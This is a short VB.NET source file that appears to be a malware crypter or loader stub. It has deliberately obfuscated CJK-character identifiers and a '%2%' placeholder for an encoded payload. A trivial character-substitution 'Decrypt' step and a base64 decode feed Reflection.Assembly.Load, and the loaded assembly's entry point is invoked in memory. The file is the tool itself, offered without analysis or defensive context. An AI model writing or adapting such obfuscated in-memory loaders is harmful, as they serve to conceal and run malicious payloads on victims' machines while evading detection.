﻿Imports System.IO
Imports System.Text
Imports System.Security.Cryptography
Module Module1
    Dim 良好可在可个的一型可一以型看你类看眉的看好在型在到眉眉眉可看 As String = "%2%"
    Dim 以型看你类看眉的看好在型在到眉眉眉可() As Byte = Convert.FromBase64String(Decrypt(良好可在可个的一型可一以型看你类看眉的看好在型在到眉眉眉可看))

    Sub main(ByVal os() As String)
        Dim 良好可在可个的一型可一以型看你类看眉的看好在型在到眉眉眉可看 As Object = Reflection.Assembly.Load(以型看你类看眉的看好在型在到眉眉眉可)
        良好可在可个的一型可一以型看你类看眉的看好在型在到眉眉眉可看.entrypoint.invoke(Nothing, Nothing)
    End Sub
    Public Function Decrypt(ByVal A As String)
        A = A.Replace("あ", "A").Replace("国", "v").Replace("日", "T").Replace("本", "M")
        Return A
    End Function
End Module

